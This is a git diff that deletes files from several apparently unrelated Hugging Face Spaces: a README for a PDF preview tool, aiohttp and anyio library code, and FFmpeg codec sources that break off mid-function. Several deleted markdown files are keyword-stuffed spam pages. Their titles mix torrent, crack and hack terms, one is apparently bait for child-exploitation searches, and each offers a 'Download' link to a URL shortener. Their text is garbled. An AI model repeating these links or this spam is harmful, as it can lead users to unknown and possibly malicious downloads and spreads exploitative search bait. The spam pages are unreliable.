105ad2a0a22e4704bf585c1d7a27e6532476f392..0000000000000000000000000000000000000000 --- a/spaces/chuanenlin/pdf2preview/README.md +++ /dev/null @@ -1,43 +0,0 @@ ---- -title: PDF ➡️ Preview -emoji: 📄 -colorFrom: purple -colorTo: purple -sdk: streamlit -app_file: pdf2preview.py ---- - -# PDF ➡️ Preview - -A simple tool to save me time on Illustrator. Generates a preview image for a PDF file. Useful for sneak peeks to academic publications on project websites or presentation slides. - -![Example](/Users/david/Home/CMU/Notes/images/example-6133654.png) - ---- - -## Try it out! - -http://pdf2preview.chuanenlin.com - ---- - -## Setting up - -1. Clone the repository. - -```python -git clone https://github.com/chuanenlin/pdf2preview.git -cd pdf2preview -``` - -2. Install package dependencies. - -```python -pip install -r requirements.txt -``` - -3. Run the app. - -```python -streamlit run pdf2preview.py -``` diff --git a/spaces/cihyFjudo/fairness-paper-search/Andre Gagnon Collection 1975 2003 Torrent 43 Goddess Encarta Pena HOT.md b/spaces/cihyFjudo/fairness-paper-search/Andre Gagnon Collection 1975 2003 Torrent 43 Goddess Encarta Pena HOT.md deleted file mode 100644 index 111fef33ea2843e8f471b5e1b5c4e5ccb5ea0c89..0000000000000000000000000000000000000000 --- a/spaces/cihyFjudo/fairness-paper-search/Andre Gagnon Collection 1975 2003 Torrent 43 Goddess Encarta Pena HOT.md +++ /dev/null @@ -1,6 +0,0 @@ -

Andre Gagnon Collection 1975 2003 Torrent 43 goddess encarta pena


Download File ››››› https://tinurli.com/2uwjbk



- - aaccfb2cb3
-
-
-

diff --git a/spaces/cihyFjudo/fairness-paper-search/Cherish Preteen Model Full Sets.md b/spaces/cihyFjudo/fairness-paper-search/Cherish Preteen Model Full Sets.md deleted file mode 100644 index 92b1e53c7109ec00acb072fa32581ef3cf15c124..0000000000000000000000000000000000000000 --- a/spaces/cihyFjudo/fairness-paper-search/Cherish Preteen Model Full Sets.md +++ /dev/null @@ -1,5 +0,0 @@ -
-

At HABA, we love creating timeless toys like puppets, block sets, and so much more. Our collection of hand puppets is full of unique, fantasy-inspired designs. From a classic princess puppet to a musical donkey, your child will be able to create their own stories featuring an exciting cast of characters!

-

cherish preteen model full sets


DOWNLOADhttps://tinurli.com/2uwj7v



aaccfb2cb3
-
-
\ No newline at end of file diff --git a/spaces/cihyFjudo/fairness-paper-search/IL Portiere Di Reestraat 16 Parte 2 2014 The Shocking Revelations of the Doorman of Reestraat 16.md b/spaces/cihyFjudo/fairness-paper-search/IL Portiere Di Reestraat 16 Parte 2 2014 The Shocking Revelations of the Doorman of Reestraat 16.md deleted file mode 100644 index 431394c5e2f70b2bfed18e83804a98380b569030..0000000000000000000000000000000000000000 --- a/spaces/cihyFjudo/fairness-paper-search/IL Portiere Di Reestraat 16 Parte 2 2014 The Shocking Revelations of the Doorman of Reestraat 16.md +++ /dev/null @@ -1,6 +0,0 @@ -

IL Portiere Di Reestraat 16 Parte 2 2014


Download ❤❤❤ https://tinurli.com/2uwk0j



-
- aaccfb2cb3
-
-
-

diff --git a/spaces/cihyFjudo/fairness-paper-search/Motorola Wimax CPEi 23825 HACK22 Learn How to Upgrade Your Wimax Modem with RJX 50 Tamlam.md b/spaces/cihyFjudo/fairness-paper-search/Motorola Wimax CPEi 23825 HACK22 Learn How to Upgrade Your Wimax Modem with RJX 50 Tamlam.md deleted file mode 100644 index 370e17430eaf9989429c1f41267eafb569178c2d..0000000000000000000000000000000000000000 --- a/spaces/cihyFjudo/fairness-paper-search/Motorola Wimax CPEi 23825 HACK22 Learn How to Upgrade Your Wimax Modem with RJX 50 Tamlam.md +++ /dev/null @@ -1,6 +0,0 @@ -

Motorola Wimax CPEi 23825 HACK22


Download Zip »»» https://tinurli.com/2uwiM5



-
- aaccfb2cb3
-
-
-

diff --git a/spaces/cihyFjudo/fairness-paper-search/[Desktop Themes - Microsoft Support](3).md b/spaces/cihyFjudo/fairness-paper-search/[Desktop Themes - Microsoft Support](3).md deleted file mode 100644 index 12eb007f686effb9b14e2908c7bf8c906ed25ec3..0000000000000000000000000000000000000000 --- a/spaces/cihyFjudo/fairness-paper-search/[Desktop Themes - Microsoft Support](3).md +++ /dev/null @@ -1,6 +0,0 @@ -

Windows 8 Theme Pack For Pc Free 15 einstufungstest vera


Download Filehttps://tinurli.com/2uwiRH



-
- aaccfb2cb3
-
-
-

diff --git a/spaces/cloudtheboi/Lofi4All/.pythonlibs/lib/python3.10/site-packages/aiohttp/http.py b/spaces/cloudtheboi/Lofi4All/.pythonlibs/lib/python3.10/site-packages/aiohttp/http.py deleted file mode 100644 index ca9dc54b215f7977970658250f23e3be137f1b3e..0000000000000000000000000000000000000000 --- a/spaces/cloudtheboi/Lofi4All/.pythonlibs/lib/python3.10/site-packages/aiohttp/http.py +++ /dev/null @@ -1,70 +0,0 @@ -import http.server -import sys -from typing import Mapping, Tuple - -from . import __version__ -from .http_exceptions import HttpProcessingError as HttpProcessingError -from .http_parser import ( - HeadersParser as HeadersParser, - HttpParser as HttpParser, - HttpRequestParser as HttpRequestParser, - HttpResponseParser as HttpResponseParser, - RawRequestMessage as RawRequestMessage, - RawResponseMessage as RawResponseMessage, -) -from .http_websocket import ( - WS_CLOSED_MESSAGE as WS_CLOSED_MESSAGE, - WS_CLOSING_MESSAGE as WS_CLOSING_MESSAGE, - WS_KEY as WS_KEY, - WebSocketError as WebSocketError, - WebSocketReader as WebSocketReader, - WebSocketWriter as WebSocketWriter, - WSCloseCode as WSCloseCode, - WSMessage as WSMessage, - WSMsgType as WSMsgType, - ws_ext_gen as ws_ext_gen, - ws_ext_parse as ws_ext_parse, -) -from .http_writer import ( - HttpVersion as HttpVersion, - HttpVersion10 as HttpVersion10, - HttpVersion11 as HttpVersion11, - StreamWriter as StreamWriter, -) - -__all__ = ( - "HttpProcessingError", - "RESPONSES", - "SERVER_SOFTWARE", - # .http_writer - "StreamWriter", - "HttpVersion", - "HttpVersion10", - "HttpVersion11", - # .http_parser - "HeadersParser", - "HttpParser", - "HttpRequestParser", - "HttpResponseParser", - "RawRequestMessage", - "RawResponseMessage", - # .http_websocket - "WS_CLOSED_MESSAGE", - "WS_CLOSING_MESSAGE", - "WS_KEY", - "WebSocketReader", - "WebSocketWriter", - "ws_ext_gen", - "ws_ext_parse", - "WSMessage", - "WebSocketError", - "WSMsgType", - "WSCloseCode", -) - - -SERVER_SOFTWARE: str = "Python/{0[0]}.{0[1]} aiohttp/{1}".format( - sys.version_info, __version__ -) - -RESPONSES: Mapping[int, Tuple[str, str]] = http.server.BaseHTTPRequestHandler.responses diff --git a/spaces/cloudtheboi/Lofi4All/.pythonlibs/lib/python3.10/site-packages/anyio/_core/_compat.py b/spaces/cloudtheboi/Lofi4All/.pythonlibs/lib/python3.10/site-packages/anyio/_core/_compat.py deleted file mode 100644 index 22d29ab8ac303756047d105dadafcfd5107563ef..0000000000000000000000000000000000000000 --- a/spaces/cloudtheboi/Lofi4All/.pythonlibs/lib/python3.10/site-packages/anyio/_core/_compat.py +++ /dev/null @@ -1,217 +0,0 @@ -from __future__ import annotations - -from abc import ABCMeta, abstractmethod -from contextlib import AbstractContextManager -from types import TracebackType -from typing import ( - TYPE_CHECKING, - Any, - AsyncContextManager, - Callable, - ContextManager, - Generator, - Generic, - Iterable, - List, - TypeVar, - Union, - overload, -) -from warnings import warn - -if TYPE_CHECKING: - from ._testing import TaskInfo -else: - TaskInfo = object - -T = TypeVar("T") -AnyDeprecatedAwaitable = Union[ - "DeprecatedAwaitable", - "DeprecatedAwaitableFloat", - "DeprecatedAwaitableList[T]", - TaskInfo, -] - - -@overload -async def maybe_async(__obj: TaskInfo) -> TaskInfo: - ... - - -@overload -async def maybe_async(__obj: DeprecatedAwaitableFloat) -> float: - ... - - -@overload -async def maybe_async(__obj: DeprecatedAwaitableList[T]) -> list[T]: - ... - - -@overload -async def maybe_async(__obj: DeprecatedAwaitable) -> None: - ... - - -async def maybe_async( - __obj: AnyDeprecatedAwaitable[T], -) -> TaskInfo | float | list[T] | None: - """ - Await on the given object if necessary. - - This function is intended to bridge the gap between AnyIO 2.x and 3.x where some functions and - methods were converted from coroutine functions into regular functions. - - Do **not** try to use this for any other purpose! - - :return: the result of awaiting on the object if coroutine, or the object itself otherwise - - .. versionadded:: 2.2 - - """ - return __obj._unwrap() - - -class _ContextManagerWrapper: - def __init__(self, cm: ContextManager[T]): - self._cm = cm - - async def __aenter__(self) -> T: - return self._cm.__enter__() - - async def __aexit__( - self, - exc_type: type[BaseException] | None, - exc_val: BaseException | None, - exc_tb: TracebackType | None, - ) -> bool | None: - return self._cm.__exit__(exc_type, exc_val, exc_tb) - - -def maybe_async_cm( - cm: ContextManager[T] | AsyncContextManager[T], -) -> AsyncContextManager[T]: - """ - Wrap a regular context manager as an async one if necessary. - - This function is intended to bridge the gap between AnyIO 2.x and 3.x where some functions and - methods were changed to return regular context managers instead of async ones. - - :param cm: a regular or async context manager - :return: an async context manager - - .. versionadded:: 2.2 - - """ - if not isinstance(cm, AbstractContextManager): - raise TypeError("Given object is not an context manager") - - return _ContextManagerWrapper(cm) - - -def _warn_deprecation( - awaitable: AnyDeprecatedAwaitable[Any], stacklevel: int = 1 -) -> None: - warn( - f'Awaiting on {awaitable._name}() is deprecated. Use "await ' - f"anyio.maybe_async({awaitable._name}(...)) if you have to support both AnyIO 2.x " - f'and 3.x, or just remove the "await" if you are completely migrating to AnyIO 3+.', - DeprecationWarning, - stacklevel=stacklevel + 1, - ) - - -class DeprecatedAwaitable: - def __init__(self, func: Callable[..., DeprecatedAwaitable]): - self._name = f"{func.__module__}.{func.__qualname__}" - - def __await__(self) -> Generator[None, None, None]: - _warn_deprecation(self) - if False: - yield - - def __reduce__(self) -> tuple[type[None], tuple[()]]: - return type(None), () - - def _unwrap(self) -> None: - return None - - -class DeprecatedAwaitableFloat(float): - def __new__( - cls, x: float, func: Callable[..., DeprecatedAwaitableFloat] - ) -> DeprecatedAwaitableFloat: - return super().__new__(cls, x) - - def __init__(self, x: float, func: Callable[..., DeprecatedAwaitableFloat]): - self._name = f"{func.__module__}.{func.__qualname__}" - - def __await__(self) -> Generator[None, None, float]: - _warn_deprecation(self) - if False: - yield - - return float(self) - - def __reduce__(self) -> tuple[type[float], tuple[float]]: - return float, (float(self),) - - def _unwrap(self) -> float: - return float(self) - - -class DeprecatedAwaitableList(List[T]): - def __init__( - self, - iterable: Iterable[T] = (), - *, - func: Callable[..., DeprecatedAwaitableList[T]], - ): - super().__init__(iterable) - self._name = f"{func.__module__}.{func.__qualname__}" - - def __await__(self) -> Generator[None, None, list[T]]: - _warn_deprecation(self) - if False: - yield - - return list(self) - - def __reduce__(self) -> tuple[type[list[T]], tuple[list[T]]]: - return list, (list(self),) - - def _unwrap(self) -> list[T]: - return list(self) - - -class DeprecatedAsyncContextManager(Generic[T], metaclass=ABCMeta): - @abstractmethod - def __enter__(self) -> T: - pass - - @abstractmethod - def __exit__( - self, - exc_type: type[BaseException] | None, - exc_val: BaseException | None, - exc_tb: TracebackType | None, - ) -> bool | None: - pass - - async def __aenter__(self) -> T: - warn( - f"Using {self.__class__.__name__} as an async context manager has been deprecated. " - f'Use "async with anyio.maybe_async_cm(yourcontextmanager) as foo:" if you have to ' - f'support both AnyIO 2.x and 3.x, or just remove the "async" from "async with" if ' - f"you are completely migrating to AnyIO 3+.", - DeprecationWarning, - ) - return self.__enter__() - - async def __aexit__( - self, - exc_type: type[BaseException] | None, - exc_val: BaseException | None, - exc_tb: TracebackType | None, - ) -> bool | None: - return self.__exit__(exc_type, exc_val, exc_tb) diff --git a/spaces/cloudwp/simpleGPT/README.md b/spaces/cloudwp/simpleGPT/README.md deleted file mode 100644 index 433e138a72109d1b5539211a08d895891e76597e..0000000000000000000000000000000000000000 --- a/spaces/cloudwp/simpleGPT/README.md +++ /dev/null @@ -1,13 +0,0 @@ ---- -title: SimpleGPT -emoji: 👀 -colorFrom: blue -colorTo: purple -sdk: gradio -sdk_version: 3.24.1 -app_file: app.py -pinned: false -duplicated_from: joejoeshi/simpleGPT ---- - -Check out the configuration reference at https://huggingface.co/docs/hub/spaces-config-reference diff --git a/spaces/colakin/video-generater/public/ffmpeg/libavcodec/apac.c b/spaces/colakin/video-generater/public/ffmpeg/libavcodec/apac.c deleted file mode 100644 index 3408f75292d06e95b036940d8ffb9924a2bf67d0..0000000000000000000000000000000000000000 --- a/spaces/colakin/video-generater/public/ffmpeg/libavcodec/apac.c +++ /dev/null @@ -1,278 +0,0 @@ -/* - * APAC audio decoder - * - * This file is part of FFmpeg. - * - * FFmpeg is free software; you can redistribute it and/or - * modify it under the terms of the GNU Lesser General Public - * License as published by the Free Software Foundation; either - * version 2.1 of the License, or (at your option) any later version. - * - * FFmpeg is distributed in the hope that it will be useful, - * but WITHOUT ANY WARRANTY; without even the implied warranty of - * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU - * Lesser General Public License for more details. - * - * You should have received a copy of the GNU Lesser General Public - * License along with FFmpeg; if not, write to the Free Software - * Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA - */ - -#include "libavutil/audio_fifo.h" -#include "libavutil/internal.h" -#include "libavutil/intreadwrite.h" -#include "avcodec.h" -#include "codec_internal.h" -#include "decode.h" -#include "get_bits.h" - -typedef struct ChContext { - int have_code; - int last_sample; - int last_delta; - int bit_length; - int block_length; - uint8_t block[32 * 2]; - AVAudioFifo *samples; -} ChContext; - -typedef struct APACContext { - GetBitContext gb; - int skip; - - int cur_ch; - ChContext ch[2]; - - uint8_t *bitstream; - int64_t max_framesize; - int bitstream_size; - int bitstream_index; -} APACContext; - -static av_cold int apac_close(AVCodecContext *avctx) -{ - APACContext *s = avctx->priv_data; - - av_freep(&s->bitstream); - s->bitstream_size = 0; - - for (int ch = 0; ch < 2; ch++) { - ChContext *c = &s->ch[ch]; - - av_audio_fifo_free(c->samples); - } - - return 0; -} - -static av_cold int apac_init(AVCodecContext *avctx) -{ - APACContext *s = avctx->priv_data; - - if (avctx->bits_per_coded_sample > 8) - avctx->sample_fmt = AV_SAMPLE_FMT_S16P; - else - avctx->sample_fmt = AV_SAMPLE_FMT_U8P; - - if (avctx->ch_layout.nb_channels < 1 || - avctx->ch_layout.nb_channels > 2 || - avctx->bits_per_coded_sample < 8 || - avctx->bits_per_coded_sample > 16 - ) - return AVERROR_INVALIDDATA; - - for (int ch = 0; ch < avctx->ch_layout.nb_channels; ch++) { - ChContext *c = &s->ch[ch]; - - c->bit_length = avctx->bits_per_coded_sample; - c->block_length = 8; - c->have_code = 0; - c->samples = av_audio_fifo_alloc(avctx->sample_fmt, 1, 1024); - if (!c->samples) - return AVERROR(ENOMEM); - } - - s->max_framesize = 1024; - s->bitstream = av_realloc_f(s->bitstream, s->max_framesize + AV_INPUT_BUFFER_PADDING_SIZE, sizeof(*s->bitstream)); - if (!s->bitstream) - return AVERROR(ENOMEM); - - return 0; -} - -static int get_code(ChContext *c, GetBitContext *gb) -{ - if (get_bits1(gb)) { - int code = get_bits(gb, 2); - - switch (code) { - case 0: - c->bit_length--; - break; - case 1: - c->bit_length++; - break; - case 2: - c->bit_length = get_bits(gb, 5); - break; - case 3: - c->block_length = get_bits(gb, 4); - return 1; - } - } - - return 0; -} - -static int apac_decode(AVCodecContext *avctx, AVFrame *frame, - int *got_frame_ptr, AVPacket *pkt) -{ - APACContext *s = avctx->priv_data; - GetBitContext *gb = &s->gb; - int ret, n, buf_size, input_buf_size; - const uint8_t *buf; - int nb_samples; - - if (!pkt->size && s->bitstream_size <= 0) { - *got_frame_ptr = 0; - return 0; - } - - buf_size = pkt->size; - input_buf_size = buf_size; - - if (s->bitstream_index > 0 && s->bitstream_size > 0) { - memmove(s->bitstream, &s->bitstream[s->bitstream_index], s->bitstream_size); - s->bitstream_index = 0; - } - - if (s->bitstream_index + s->bitstream_size + buf_size > s->max_framesize) { - s->bitstream = av_realloc_f(s->bitstream, s->bitstream_index + - s->bitstream_size + - buf_size + AV_INPUT_BUFFER_PADDING_SIZE, - sizeof(*s->bitstream)); - if (!s->bitstream) - return AVERROR(ENOMEM); - s->max_framesize = s->bitstream_index + s->bitstream_size + buf_size; - } - if (pkt->data) - memcpy(&s->bitstream[s->bitstream_index + s->bitstream_size], pkt->data, buf_size); - buf = &s->bitstream[s->bitstream_index]; - buf_size += s->bitstream_size; - s->bitstream_size = buf_size; - - frame->nb_samples = s->bitstream_size * 16 * 8; - if ((ret = ff_get_buffer(avctx, frame, 0)) < 0) - return ret; - - if ((ret = init_get_bits8(gb, buf, buf_size)) < 0) - return ret; - - skip_bits(gb, s->skip); - s->skip = 0; - - while (get_bits_left(gb) > 0) { - for (int ch = s->cur_ch; ch < avctx->ch_layout.nb_channels; ch++) { - ChContext *c = &s->ch[ch]; - int16_t *dst16 = (int16_t *)c->block; - uint8_t *dst8 = (uint8_t *)c->block; - void *samples[4]; - - samples[0] = &c->block[0]; - if (get_bits_left(gb) < 16 && pkt->size) { - s->cur_ch = ch; - goto end; - } - - if (!c->have_code && get_code(c, gb)) - get_code(c, gb); - c->have_code = 0; - - if (c->block_length <= 0) - continue; - - if (c->bit_length < 0 || - c->bit_length > 17) { - c->bit_length = avctx->bits_per_coded_sample; - s->bitstream_index = 0; - s->bitstream_size = 0; - return AVERROR_INVALIDDATA; - } - - if (get_bits_left(gb) < c->block_length * c->bit_length) { - if (pkt->size) { - c->have_code = 1; - s->cur_ch = ch; - goto end; - } else { - break; - } - } - - for (int i = 0; i < c->block_length; i++) { - int val = get_bits_long(gb, c->bit_length); - unsigned delta = (val & 1) ? ~(val >> 1) : (val >> 1); - int sample; - - delta += c->last_delta; - sample = c->last_sample + delta; - c->last_delta = delta; - c->last_sample = sample; - - switch (avctx->sample_fmt) { - case AV_SAMPLE_FMT_S16P: - dst16[i] = sample; - break; - case AV_SAMPLE_FMT_U8P: - dst8[i] = sample; - break; - } - } - - av_audio_fifo_write(c->samples, samples, c->block_length); - } - - s->cur_ch = 0; - } -end: - nb_samples = frame->nb_samples; - for (int ch = 0; ch < avctx->ch_layout.nb_channels; ch++) - nb_samples = FFMIN(av_audio_fifo_size(s->ch[ch].samples), nb_samples); - - frame->nb_samples = nb_samples; - for (int ch = 0; ch < avctx->ch_layout.nb_channels; ch++) { - void *samples[1] = { frame->extended_data[ch] }; - av_audio_fifo_read(s->ch[ch].samples, samples, nb_samples); - } - - s->skip = get_bits_count(gb) - 8 * (get_bits_count(gb) / 8); - n = get_bits_count(gb) / 8; - - if (nb_samples > 0 || pkt->size) - *got_frame_ptr = 1; - - if (s->bitstream_size > 0) { - s->bitstream_index += n; - s->bitstream_size -= n; - return input_buf_size; - } - return n; -} - -const FFCodec ff_apac_decoder = { - .p.name = "apac", - CODEC_LONG_NAME("Marian's A-pac audio"), - .p.type = AVMEDIA_TYPE_AUDIO, - .p.id = AV_CODEC_ID_APAC, - .priv_data_size = sizeof(APACContext), - .init = apac_init, - FF_CODEC_DECODE_CB(apac_decode), - .close = apac_close, - .p.capabilities = AV_CODEC_CAP_DELAY | - AV_CODEC_CAP_DR1 | - AV_CODEC_CAP_SUBFRAMES, - .caps_internal = FF_CODEC_CAP_INIT_CLEANUP, - .p.sample_fmts = (const enum AVSampleFormat[]) { AV_SAMPLE_FMT_U8P, - AV_SAMPLE_FMT_S16P, - AV_SAMPLE_FMT_NONE }, -}; diff --git a/spaces/colakin/video-generater/public/ffmpeg/libavcodec/chomp_bsf.c b/spaces/colakin/video-generater/public/ffmpeg/libavcodec/chomp_bsf.c deleted file mode 100644 index 532b4e6a94f6be000e99508956389d652399c7ee..0000000000000000000000000000000000000000 --- a/spaces/colakin/video-generater/public/ffmpeg/libavcodec/chomp_bsf.c +++ /dev/null @@ -1,45 +0,0 @@ -/* - * Chomp bitstream filter - * Copyright (c) 2010 Alex Converse - * - * This file is part of FFmpeg. - * - * FFmpeg is free software; you can redistribute it and/or - * modify it under the terms of the GNU Lesser General Public - * License as published by the Free Software Foundation; either - * version 2.1 of the License, or (at your option) any later version. - * - * FFmpeg is distributed in the hope that it will be useful, - * but WITHOUT ANY WARRANTY; without even the implied warranty of - * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU - * Lesser General Public License for more details. - * - * You should have received a copy of the GNU Lesser General Public - * License along with FFmpeg; if not, write to the Free Software - * Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA - */ - -#include "bsf.h" -#include "bsf_internal.h" - -static int chomp_filter(AVBSFContext *ctx, AVPacket *pkt) -{ - int ret; - - ret = ff_bsf_get_packet_ref(ctx, pkt); - if (ret < 0) - return ret; - - while (pkt->size > 0 && !pkt->data[pkt->size - 1]) - pkt->size--; - - return 0; -} - -/** - * This filter removes a string of NULL bytes from the end of a packet. - */ -const FFBitStreamFilter ff_chomp_bsf = { - .p.name = "chomp", - .filter = chomp_filter, -}; diff --git a/spaces/colakin/video-generater/public/ffmpeg/libavcodec/lclenc.c b/spaces/colakin/video-generater/public/ffmpeg/libavcodec/lclenc.c deleted file mode 100644 index dd5eed9d63cf971578094beefee76d07d67e1d57..0000000000000000000000000000000000000000 --- a/spaces/colakin/video-generater/public/ffmpeg/libavcodec/lclenc.c +++ /dev/null @@ -1,167 +0,0 @@ -/* - * LCL (LossLess Codec Library) Codec - * Copyright (c) 2002-2004 Roberto Togni - * - * This file is part of FFmpeg. - * - * FFmpeg is free software; you can redistribute it and/or - * modify it under the terms of the GNU Lesser General Public - * License as published by the Free Software Foundation; either - * version 2.1 of the License, or (at your option) any later version. - * - * FFmpeg is distributed in the hope that it will be useful, - * but WITHOUT ANY WARRANTY; without even the implied warranty of - * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU - * Lesser General Public License for more details. - * - * You should have received a copy of the GNU Lesser General Public - * License along with FFmpeg; if not, write to the Free Software - * Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA - */ - -/** - * @file - * LCL (LossLess Codec Library) Video Codec - * Decoder for MSZH and ZLIB codecs - * Experimental encoder for ZLIB RGB24 - * - * Fourcc: MSZH, ZLIB - * - * Original Win32 dll: - * Ver2.23 By Kenji Oshima 2000.09.20 - * avimszh.dll, avizlib.dll - * - * A description of the decoding algorithm can be found here: - * http://www.pcisys.net/~melanson/codecs - * - * Supports: BGR24 (RGB 24bpp) - */ - -#include -#include - -#include "libavutil/avassert.h" -#include "avcodec.h" -#include "codec_internal.h" -#include "encode.h" -#include "lcl.h" -#include "zlib_wrapper.h" -#include "libavutil/internal.h" -#include "libavutil/mem.h" - -#include - -typedef struct LclEncContext { - - AVCodecContext *avctx; - - // Image type - int imgtype; - // Compression type - int compression; - // Flags - int flags; - FFZStream zstream; -} LclEncContext; - -static int encode_frame(AVCodecContext *avctx, AVPacket *pkt, - const AVFrame *p, int *got_packet) -{ - LclEncContext *c = avctx->priv_data; - z_stream *const zstream = &c->zstream.zstream; - int i, ret; - int zret; // Zlib return code - int max_size = deflateBound(zstream, avctx->width * avctx->height * 3); - - if ((ret = ff_alloc_packet(avctx, pkt, max_size)) < 0) - return ret; - - if(avctx->pix_fmt != AV_PIX_FMT_BGR24){ - av_log(avctx, AV_LOG_ERROR, "Format not supported!\n"); - return -1; - } - - zret = deflateReset(zstream); - if (zret != Z_OK) { - av_log(avctx, AV_LOG_ERROR, "Deflate reset error: %d\n", zret); - return -1; - } - zstream->next_out = pkt->data; - zstream->avail_out = pkt->size; - - for(i = avctx->height - 1; i >= 0; i--) { - zstream->next_in = p->data[0] + p->linesize[0] * i; - zstream->avail_in = avctx->width * 3; - zret = deflate(zstream, Z_NO_FLUSH); - if (zret != Z_OK) { - av_log(avctx, AV_LOG_ERROR, "Deflate error: %d\n", zret); - return -1; - } - } - zret = deflate(zstream, Z_FINISH); - if (zret != Z_STREAM_END) { - av_log(avctx, AV_LOG_ERROR, "Deflate error: %d\n", zret); - return -1; - } - - pkt->size = zstream->total_out; - *got_packet = 1; - - return 0; -} - -static av_cold int encode_init(AVCodecContext *avctx) -{ - LclEncContext *c = avctx->priv_data; - - c->avctx= avctx; - - av_assert0(avctx->width && avctx->height); - - avctx->extradata = av_mallocz(8 + AV_INPUT_BUFFER_PADDING_SIZE); - if (!avctx->extradata) - return AVERROR(ENOMEM); - - c->compression = avctx->compression_level == FF_COMPRESSION_DEFAULT ? - COMP_ZLIB_NORMAL : - av_clip(avctx->compression_level, 0, 9); - c->flags = 0; - c->imgtype = IMGTYPE_RGB24; - avctx->bits_per_coded_sample= 24; - - avctx->extradata[0]= 4; - avctx->extradata[1]= 0; - avctx->extradata[2]= 0; - avctx->extradata[3]= 0; - avctx->extradata[4]= c->imgtype; - avctx->extradata[5]= c->compression; - avctx->extradata[6]= c->flags; - avctx->extradata[7]= CODEC_ZLIB; - c->avctx->extradata_size= 8; - - return ff_deflate_init(&c->zstream, c->compression, avctx); -} - -static av_cold int encode_end(AVCodecContext *avctx) -{ - LclEncContext *c = avctx->priv_data; - - ff_deflate_end(&c->zstream); - - return 0; -} - -const FFCodec ff_zlib_encoder = { - .p.name = "zlib", - CODEC_LONG_NAME("LCL (LossLess Codec Library) ZLIB"), - .p.type = AVMEDIA_TYPE_VIDEO, - .p.id = AV_CODEC_ID_ZLIB, - .p.capabilities = AV_CODEC_CAP_DR1 | AV_CODEC_CAP_FRAME_THREADS | - AV_CODEC_CAP_ENCODER_REORDERED_OPAQUE, - .priv_data_size = sizeof(LclEncContext), - .init = encode_init, - FF_CODEC_ENCODE_CB(encode_frame), - .close = encode_end, - .p.pix_fmts = (const enum AVPixelFormat[]) { AV_PIX_FMT_BGR24, AV_PIX_FMT_NONE }, - .caps_internal = FF_CODEC_CAP_INIT_CLEANUP, -}; diff --git a/spaces/colakin/video-generater/public/ffmpeg/libavcodec/mips/hevcdsp_msa.c b/spaces/colakin/video-generater/public/ffmpeg/libavcodec/mips/hevcdsp_msa.c deleted file mode 100644 index 9c12029c1f577cff03c2da9d31882c69fb4b4761..0000000000000000000000000000000000000000 --- a/spaces/colakin/video-generater/public/ffmpeg/libavcodec/mips/hevcdsp_msa.c +++ /dev/null @@ -1,4400 +0,0 @@ -/* - * Copyright (c) 2015 - 2017 Manojkumar Bhosale (Manojkumar.Bhosale@imgtec.com) - * - * This file is part of FFmpeg. - * - * FFmpeg is free software; you can redistribute it and/or - * modify it under the terms of the GNU Lesser General Public - * License as published by the Free Software Foundation; either - * version 2.1 of the License, or (at your option) any later version. - * - * FFmpeg is distributed in the hope that it will be useful, - * but WITHOUT ANY WARRANTY; without even the implied warranty of - * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU - * Lesser General Public License for more details. - * - * You should have received a copy of the GNU Lesser General Public - * License along with FFmpeg; if not, write to the Free Software - * Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA - */ - -#include "libavutil/mips/generic_macros_msa.h" -#include "libavcodec/mips/hevcdsp_mips.h" -#include "libavcodec/mips/hevc_macros_msa.h" - -static const uint8_t ff_hevc_mask_arr[16 * 2] __attribute__((aligned(0x40))) = { - /* 8 width cases */ - 0, 1, 1, 2, 2, 3, 3, 4, 4, 5, 5, 6, 6, 7, 7, 8, - /* 4 width cases */ - 0, 1, 1, 2, 2, 3, 3, 4, 16, 17, 17, 18, 18, 19, 19, 20 -}; - -static void hevc_copy_4w_msa(const uint8_t *src, int32_t src_stride, - int16_t *dst, int32_t dst_stride, - int32_t height) -{ - v16i8 zero = { 0 }; - - if (2 == height) { - v16i8 src0, src1; - v8i16 in0; - - LD_SB2(src, src_stride, src0, src1); - - src0 = (v16i8) __msa_ilvr_w((v4i32) src1, (v4i32) src0); - in0 = (v8i16) __msa_ilvr_b(zero, src0); - in0 <<= 6; - ST_D2(in0, 0, 1, dst, dst_stride); - } else if (4 == height) { - v16i8 src0, src1, src2, src3; - v8i16 in0, in1; - - LD_SB4(src, src_stride, src0, src1, src2, src3); - - ILVR_W2_SB(src1, src0, src3, src2, src0, src1); - ILVR_B2_SH(zero, src0, zero, src1, in0, in1); - in0 <<= 6; - in1 <<= 6; - ST_D4(in0, in1, 0, 1, 0, 1, dst, dst_stride); - } else if (0 == height % 8) { - v16i8 src0, src1, src2, src3, src4, src5, src6, src7; - v8i16 in0, in1, in2, in3; - uint32_t loop_cnt; - - for (loop_cnt = (height >> 3); loop_cnt--;) { - LD_SB8(src, src_stride, - src0, src1, src2, src3, src4, src5, src6, src7); - src += (8 * src_stride); - - ILVR_W4_SB(src1, src0, src3, src2, src5, src4, src7, src6, - src0, src1, src2, src3); - ILVR_B4_SH(zero, src0, zero, src1, zero, src2, zero, src3, - in0, in1, in2, in3); - SLLI_4V(in0, in1, in2, in3, 6); - ST_D8(in0, in1, in2, in3, 0, 1, 0, 1, 0, 1, 0, 1, dst, dst_stride); - dst += (8 * dst_stride); - } - } -} - -static void hevc_copy_6w_msa(const uint8_t *src, int32_t src_stride, - int16_t *dst, int32_t dst_stride, - int32_t height) -{ - uint32_t loop_cnt = (height >> 3); - uint32_t res = height & 0x07; - v16i8 zero = { 0 }; - v16i8 src0, src1, src2, src3, src4, src5, src6, src7; - v8i16 in0, in1, in2, in3, in4, in5, in6, in7; - - for (; loop_cnt--; ) { - LD_SB8(src, src_stride, src0, src1, src2, src3, src4, src5, src6, src7); - src += (8 * src_stride); - - ILVR_B4_SH(zero, src0, zero, src1, zero, src2, zero, src3, - in0, in1, in2, in3); - ILVR_B4_SH(zero, src4, zero, src5, zero, src6, zero, src7, - in4, in5, in6, in7); - SLLI_4V(in0, in1, in2, in3, 6); - SLLI_4V(in4, in5, in6, in7, 6); - ST12x8_UB(in0, in1, in2, in3, in4, in5, in6, in7, dst, 2 * dst_stride); - dst += (8 * dst_stride); - } - 